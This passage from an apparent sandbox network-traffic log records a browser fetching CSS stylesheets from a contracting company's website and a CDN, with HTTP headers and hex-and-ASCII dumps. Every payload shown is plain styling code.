                                              2024-09-27 06:19:42 UTC8000INData Raw: 61 62 6c 65 64 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 63 31 30 37 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 66 66 63 31 30 37 0a 7d 0a 0a 2e 62 74 6e 2d 64 61 6e 67 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 64 63 33 35 34 35 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 64 63 33 35 34 35 0a 7d 0a 0a 2e 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 62 32 64 33 62 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d
                                              Data Ascii: abled { color: #000; background-color: #ffc107; border-color: #ffc107}.btn-danger { color: #fff; background-color: #dc3545; border-color: #dc3545}.btn-danger:hover { color: #fff; background-color: #bb2d3b; border-
                                              2024-09-27 06:19:42 UTC8000INData Raw: 65 72 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 63 68 65 63 6b 3a 63 68 65 63 6b 65 64 2b 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 2e 73 68 6f 77 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 20 7b 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 2e 32 35 72 65 6d 20 72 67 62 61 28 32 32 30 2c 35 33 2c 36 39 2c 2e 35 29 0a 7d 0a 0a 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 2e 64 69 73 61 62 6c 65 64 2c 2e 62 74 6e 2d 6f
                                              Data Ascii: er:focus,.btn-check:checked+.btn-outline-danger:focus,.btn-outline-danger.active:focus,.btn-outline-danger.dropdown-toggle.show:focus,.btn-outline-danger:active:focus { box-shadow: 0 0 0 .25rem rgba(220,53,69,.5)}.btn-outline-danger.disabled,.btn-o


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.465312173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:42 UTC633OUTGET /css/style.css HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: style
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:42 UTC259INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:42 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 27 Jan 2023 08:04:39 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 97809
                                              Connection: close
                                              Content-Type: text/css
                                              2024-09-27 06:19:42 UTC7933INData Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 0d 0a 2f 2a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0d 0a 0d 0a 0d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 49 6d 70 6f 72 74 20 66 6f 6e 74 73 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0d 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 34 30 30 2c 35 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 2c 39 30 30 7c 50 6f 70 70 69 6e 73 3a 34 30 30 2c 36 30 30 2c 37 30 30 7c 51 75 65 73 74 72 69 61 6c 26 73
                                              Data Ascii: @charset "utf-8";/*======================================/*-------------Import fonts ---------------------------------------*/@import url('https://fonts.googleapis.com/css?family=Montserrat:400,500,600,700,800,900|Poppins:400,600,700|Questrial&s
                                              2024-09-27 06:19:42 UTC8000INData Raw: 2d 32 31 70 78 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 68 65 69 67 68 74 3a 20 35 70 78 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 65 31 63 32 35 3b 0d 0a 09 6c 65 66 74 3a 20 30 3b 0d 0a 7d 0d 0a 0d 0a 2e 73 62 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 2d 77 72 61 70 2c 0d 0a 2e 6e 61 76 2d 62 75 74 74 6f 6e 2d 77 72 61 70 20 7b 0d 0a 09 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0d 0a 09 68 65 69 67 68 74 3a 20 37 30 70 78 3b 0d 0a 09 77 69 64 74 68 3a 20 37 30 70 78 3b 0d 0a 09 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 32 35 35 20 32 35 35 20 32 35 35 20 2f 20 32 33 25 29 3b 0d 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b
                                              Data Ascii: -21px;width: 100%;height: 5px;background: #ee1c25;left: 0;}.sb-menu-button-wrap,.nav-button-wrap {float: right;height: 70px;width: 70px;border-left: 1px solid rgb(255 255 255 / 23%);cursor: pointer;position: relative;
                                              2024-09-27 06:19:42 UTC8000INData Raw: 68 3a 20 31 32 32 34 70 78 3b 0d 0a 09 77 69 64 74 68 3a 20 39 32 25 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 39 30 70 78 20 30 20 37 30 70 78 20 35 30 70 78 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 37 30 37 30 37 30 3b 0d 0a 7d 0d 0a 0d 0a 2e 66 6f 6f 74 65 72 2d 6c 6f 67 6f 20 7b 0d 0a 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 7d 0d 0a 0d 0a 2e 66 6f 6f 74 65 72 2d 6c 6f 67 6f 20 69 6d 67 20 7b 0d 0a 09 77 69 64 74 68 3a 20 31 33 30 70 78 3b 0d 0a 09 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 7d 0d 0a 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 66 6f 6f 74 65 72 3a 62 65 66 6f 72 65 20 7b 0d 0a
                                              Data Ascii: h: 1224px;width: 92%;padding: 90px 0 70px 50px;background: #707070;}.footer-logo {float: left;margin-bottom: 20px;width: 100%;}.footer-logo img {width: 130px;height: auto;float: left;}.content-footer:before {
                                              2024-09-27 06:19:42 UTC8000INData Raw: 6c 6c 2d 6e 61 76 2d 77 72 61 70 20 2e 73 63 72 6f 6c 6c 2d 6e 61 76 20 6c 69 20 61 3a 62 65 66 6f 72 65 20 7b 0d 0a 09 63 6f 6e 74 65 6e 74 3a 20 27 27 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 09 62 6f 74 74 6f 6d 3a 20 2d 32 30 70 78 3b 0d 0a 09 72 69 67 68 74 3a 20 2d 33 30 70 78 3b 0d 0a 09 68 65 69 67 68 74 3a 20 30 70 78 3b 0d 0a 09 77 69 64 74 68 3a 20 36 70 78 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 3b 0d 0a 7d 0d 0a 0d 0a 2e 73 72 6f 6c 6c 2d 6e 61 76 2d 77 72 61 70 20 2e 73 63 72 6f 6c 6c 2d 6e 61 76 2e 62 6c 61 63 6b 2d 62 67 20 6c 69 20 61 3a 62 65 66 6f 72 65 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 7d 0d 0a 0d 0a 2e 73 72 6f 6c 6c 2d 6e 61 76 2d 77 72 61 70
                                              Data Ascii: ll-nav-wrap .scroll-nav li a:before {content: '';position: absolute;bottom: -20px;right: -30px;height: 0px;width: 6px;background: #000;}.sroll-nav-wrap .scroll-nav.black-bg li a:before {background: #fff;}.sroll-nav-wrap
                                              2024-09-27 06:19:42 UTC8000INData Raw: 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0d 0a 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 73 65 72 76 2d 69 74 65 6d 20 2e 70 72 2d 6c 69 73 74 20 7b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 31 35 70 78 20 30 3b 0d 0a 7d 0d 0a 0d 0a 2e 73 65 72 76 2d 70 72 69 63 65 2d 77 72 61 70 20 7b 0d 0a 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 31 39 70 78 20 33 30 70 78 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 73 65 72 76 2d 70 72 69 63 65 2d 77 72 61 70 20 73 70 61 6e 20 7b 0d 0a
                                              Data Ascii: form: uppercase;padding-bottom: 20px;}.serv-item .pr-list {padding: 15px 0;}.serv-price-wrap {float: left;margin: 10px 0;padding: 19px 30px;background: #000;color: #fff;font-size: 12px;}.serv-price-wrap span {
                                              2024-09-27 06:19:42 UTC8000INData Raw: 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 65 31 63 32 35 3b 0d 0a 09 68 65 69 67 68 74 3a 20 36 70 78 3b 0d 0a 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 32 30 30 6d 73 20 6c 69 6e 65 61 72 3b 0d 0a 09 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 32 30 30 6d 73 20 6c 69 6e 65 61 72 3b 0d 0a 7d 0d 0a 0d 0a 2e 66 6c 61 74 2d 66 69 6c 74 65 72 20 2e 67 61 6c 6c 65 72 79 2d 66 69 6c 74 65 72 73 20 61 3a 62 65 66 6f 72 65 20 7b 0d 0a 09 62 6f 74 74 6f 6d 3a 20 34 32 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 62 6f 6c 64 2d 66 69 6c 74 65 72 2e 69 6e 6c 69 6e 65 2d 66 69 6c 74 65 72 20 2e 67 61 6c 6c 65 72 79 2d 66 69 6c 74 65 72 73 20 61 2e 67 61 6c 6c 65 72 79 2d 66 69 6c 74 65 72 2d 61 63 74 69 76 65 3a 62 65 66 6f 72 65 20
                                              Data Ascii: background: #ee1c25;height: 6px;-webkit-transition: all 200ms linear;transition: all 200ms linear;}.flat-filter .gallery-filters a:before {bottom: 42px;}.bold-filter.inline-filter .gallery-filters a.gallery-filter-active:before
                                              2024-09-27 06:19:42 UTC8000INData Raw: 65 64 69 75 6d 27 3b 0d 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 0d 0a 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 0d 0a 7d 0d 0a 0d 0a 2e 70 72 2d 74 69 74 6c 65 20 73 70 61 6e 20 7b 0d 0a 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0d 0a 09 66 6f 6e 74
                                              Data Ascii: edium';font-weight: 300;position: relative;padding-right: 20px;color: #fff;}.pr-title span {float: left;width: 100%;padding-top: 10px;color: #999;text-align: left;font-size: 12px;text-transform: uppercase;font
                                              2024-09-27 06:19:42 UTC8000INData Raw: 2e 63 75 72 2d 70 61 67 65 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 6f 72 61 2d 4d 65 64 69 75 6d 27 3b 0d 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 38 30 30 3b 0d 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 38 70 78 3b 0d 0a 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 7d 0d 0a 0d 0a 2e 63 75 72 2d 70 61 67 65 20 73 70 61 6e 20 7b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 74 6f 70 3a 20 2d 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 66 73 2d 67 61 6c 6c 65 72 79 2d 77 72 61 70 20 7b 0d 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 09 7a 2d 69
                                              Data Ascii: .cur-page {font-size: 12px;font-family: 'Sora-Medium';font-weight: 800;padding-top: 18px;float: left;width: 100%;}.cur-page span {color: #666;position: relative;top: -6px;}.fs-gallery-wrap {overflow: hidden;z-i
                                              2024-09-27 06:19:42 UTC8000INData Raw: 69 74 65 6d 3a 68 6f 76 65 72 20 2e 6f 76 65 72 6c 61 79 20 7b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 30 2e 33 3b 0d 0a 7d 0d 0a 0d 0a 2e 62 6f 78 2d 69 74 65 6d 3a 68 6f 76 65 72 20 69 6d 67 2c 0d 0a 2e 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 68 6f 76 65 72 20 69 6d 67 20 7b 0d 0a 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 2e 31 35 29 3b 0d 0a 09 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 2e 31 35 29 3b 0d 0a 09 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 2e 31 35 29 3b 0d 0a 7d 0d 0a 0d 0a 2e 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 68 6f 76 65 72 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 69 6d 67 20 7b 0d 0a 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65
                                              Data Ascii: item:hover .overlay {opacity: 0.3;}.box-item:hover img,.gallery-item:hover img {-webkit-transform: scale(1.15);-moz-transform: scale(1.15);transform: scale(1.15);}.gallery-item:hover .swiper-slide img {-webkit-transform: scale
                                              2024-09-27 06:19:42 UTC8000INData Raw: 3b 0d 0a 09 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 31 35 70 78 20 33 30 70 78 20 31 35 70 78 20 33 30 70 78 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0d 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 09 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 6e 6f 6e 65 3b 0d 0a 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 32 30 30 6d 73 20 6c 69 6e 65 61 72 3b 0d 0a 09 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 32 30 30 6d 73 20 6c 69 6e 65 61 72 3b 0d 0a 09 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 32 30 30 6d 73 20 6c 69 6e 65 61 72 3b 0d 0a 09 2d 6d 73 2d 74 72 61 6e 73 69
                                              Data Ascii: ;text-transform: uppercase;padding: 15px 30px 15px 30px;line-height: 17px;cursor: pointer;-webkit-appearance: none;-webkit-transition: all 200ms linear;-moz-transition: all 200ms linear;-o-transition: all 200ms linear;-ms-transi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.465316173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:42 UTC637OUTGET /css/yourstyle.css HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: style
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:42 UTC259INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:42 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 14:33:16 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 19844
                                              Connection: close
                                              Content-Type: text/css
                                              2024-09-27 06:19:42 UTC7933INData Raw: 40 63 68 61 72 73 65 74 20 22 75 74 66 2d 38 22 3b 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 46 6f 6e 74 20 46 61 6d 69 6c 79 3a 20 53 6f 72 61 0a 20 2a 20 44 65 73 69 67 6e 65 64 20 62 79 3a 20 4a 6f 6e 61 74 68 61 6e 20 42 61 72 6e 62 72 6f 6f 6b 2c 20 4a 75 6c 69 c3 a1 6e 20 4d 6f 6e 63 61 64 61 0a 20 2a 20 55 52 4c 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 6e 74 73 68 61 72 65 2e 63 6f 6d 2f 66 6f 6e 74 73 2f 73 6f 72 61 2f 73 6f 72 61 0a 20 2a 20 c2 a9 20 32 30 32 32 20 49 6e 64 69 61 6e 20 54 79 70 65 20 46 6f 75 6e 64 72 79 0a 20 2a 0a 20 2a 20 46 6f 6e 74 20 53 74 79 6c 65 73 3a 0a 20 2a 20 53 6f 72 61 20 56 61 72 69 61 62 6c 65 28 56 61 72 69 61 62 6c 65 20 66 6f 6e 74 29 0a 20 2a 20 53
                                              Data Ascii: @charset "utf-8";/** * @license * * Font Family: Sora * Designed by: Jonathan Barnbrook, Julin Moncada * URL: https://www.fontshare.com/fonts/sora/sora * 2022 Indian Type Foundry * * Font Styles: * Sora Variable(Variable font) * S
                                              2024-09-27 06:19:42 UTC8000INData Raw: 30 73 3b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 2e 33 73 20 65 61 73 65 20 30 73 3b 0a 7d 0a 0a 2e 6e 61 76 2d 6c 69 6e 6b 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 72 65 6d 20 31 72 65 6d 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 2c 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 2c 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 2d 69
                                              Data Ascii: 0s; transition: all .3s ease 0s;}.nav-link { display: block; padding: 0.5rem 1rem; text-decoration: none; border: 1px solid transparent; -webkit-transition: color .15s ease-in-out, background-color .15s ease-in-out, border-color .15s ease-i
                                              2024-09-27 06:19:42 UTC3911INData Raw: 20 20 7d 0a 0a 20 20 2e 68 65 61 64 65 72 2e 73 74 69 63 6b 20 7b 0a 20 20 20 20 2f 2a 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 70 78 20 2a 2f 0a 20 20 7d 0a 0a 20 20 0a 2e 6e 61 76 2d 69 63 6f 6e 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 33 32 33 61 20 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 20 20 2e 68 65 61 64 65 72 2e 68 65 61 64 65 72 2d 32 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 44 42 45 43 45 35 0a 20 20 7d 0a 0a 20 20 2e 73 74 69 63 6b 79 2d 62 61 72 2e 73 74 69 63 6b 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 37 30 30 6d 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 73 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 31 20 72 75 6e 6e 69 6e 67 20 66
                                              Data Ascii: } .header.stick { /* padding: 10px 0px */ } .nav-icon{ background: #ef323a !important;} .header.header-2 { background-color: #DBECE5 } .sticky-bar.stick { -webkit-animation: 700ms ease-in-out 0s normal none 1 running f


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.465317104.17.25.144436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:42 UTC592OUTGET /ajax/libs/font-awesome/6.2.1/css/all.min.css HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: style
                                              Referer: https://www.citydiamondcontracting.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:19:42 UTC916INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:42 GMT
                                              Content-Type: text/css; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: W/"6373d4a6-545d"
                                              Last-Modified: Tue, 15 Nov 2022 18:04:22 GMT
                                              cf-cdnjs-via: cfworker/kv
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: HIT
                                              Age: 564190
                                              Expires: Wed, 17 Sep 2025 06:19:42 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NltghiBXwDetgPEit4x0I9VCHhB9rNqCqatgmTddXM7riko1ZovOLc4ih%2BSzksvg7QjlkpMnPlrvPipcm47zzCXN3%2Bmxotu53wU5aYaabXn%2FN9d9H3ah8gbQjasE6kK9ao%2B07U1"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 8c996237fe495e6d-EWR
                                              2024-09-27 06:19:42 UTC453INData Raw: 37 63 30 33 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 32 2e 31 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                              Data Ascii: 7c03/*! * Font Awesome Free 6.2.1 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */.fa{font-family:var(--fa-style
